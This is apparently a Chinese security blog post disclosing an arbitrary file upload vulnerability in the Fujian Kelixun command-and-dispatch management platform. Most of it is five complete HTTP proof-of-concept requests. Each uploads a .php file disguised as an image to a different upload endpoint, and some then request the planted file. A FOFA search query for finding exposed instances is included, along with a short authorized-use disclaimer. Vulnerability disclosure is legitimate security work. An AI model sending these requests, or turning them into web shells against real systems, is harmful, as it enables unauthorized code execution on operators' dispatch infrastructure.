【护网漏洞】福建科立讯通信指挥调度管理平台任意文件上传

2024-07-31 12:23:24 浏览数 (2)

影响范围

福建科立讯通信指挥调度管理平台

漏洞概述

福建科立讯通信指挥调度管理平台任意文件上传

漏洞复现

应用界面如下:

漏洞POC1:

代码语言:javascript复制
POST /api/client/fileupload.php HTTP/1.1          
Host:           
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0          
Accept-Encoding: gzip, deflate          
Accept: */*          
Connection: close          
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M          
Content-Length: 477          


          
------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
Content-Disposition: form-data; name="file"; filename="rcnlsq.php"          
Content-Type: image/jpeg          


          
5465rcnlsq          
------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
Content-Disposition: form-data; name="number";          


          
5465          
------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
Content-Disposition: form-data; name="type";          


          
1          
------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
Content-Disposition: form-data; name="title";          


          
1          
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--    

利用方式2:

代码语言:javascript复制
POST /api/client/upload.php HTTP/1.1          
Host:           
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0          
Accept-Encoding: gzip, deflate          
Accept: */*          
Connection: close          
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M          
Content-Length: 194          


          
------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
Content-Disposition: form-data; name="ulfile"; filename="lztkkl.php"          
Content-Type: image/jpeg          


          
99647lztkkl          
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--          


          
GET /upload/lztkkl.php HTTP/1.1          
Host:           
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0          
Accept-Encoding: gzip, deflate          
Accept: */*          
Connection: close

利用方式3:

代码语言:javascript复制
POST /api/client/task/uploadfile.php HTTP/1.1          
Host:           
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0          
Accept-Encoding: gzip, deflate          
Accept: */*          
Connection: close          
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M          
Content-Length: 198          


          
------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
Content-Disposition: form-data; name="uploadfile"; filename="rvfuid.php"          
Content-Type: image/jpeg          


          
97236rvfuid          
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--          


          
文件路径:响应包获取

利用方式4:

代码语言:javascript复制
POST /api/client/event/uploadfile.php HTTP/1.1          
Host:           
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0          
Accept-Encoding: gzip, deflate          
Accept: */*          
Connection: close          
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M          
Content-Length: 198          


          
------WebKitFormBoundaryVBf7Cs8QWsfwC82M          
Content-Disposition: form-data; name="uploadfile"; filename="iuctmt.php"          
Content-Type: image/jpeg          


          
48620iuctmt          
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--          


          
文件地址:响应包获取

利用方式5:

代码语言:javascript复制
POST /api/client/upload.php HTTP/1.1          
Host:           
User-Agent: python-requests/2.31.0          
Accept-Encoding: gzip, deflate          
Accept: */*          
Connection: close          
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK          
Content-Length: 200          


          
------WebKitFormBoundarymVk33liI64J7GQaK          
Content-Disposition: form-data; name="ulfile"; filename="dzfuxvtm.php"          
Content-Type: image/jpeg          


          
dzfuxvtm186448          
------WebKitFormBoundarymVk33liI64J7GQaK--          


          
GET /upload/dzfuxvtm.php HTTP/1.1          
Host:           
User-Agent: python-requests/2.31.0          
Accept-Encoding: gzip, deflate          
Accept: */*          
Connection: close    
资产测绘

FOFA检索:

代码语言:javascript复制
body="指挥调度管理平台" && title=="指挥调度管理平台"

免责声明

本篇文章提及的漏洞POC仅限于安全人员在授权的情况下对业务系统进行测评验证,由于传播、利用本篇文章中提及的漏洞POC进行未授权的非法攻击测试造成的法律责任均由使用者本人负责,本人不为此承担任何责任

0 人点赞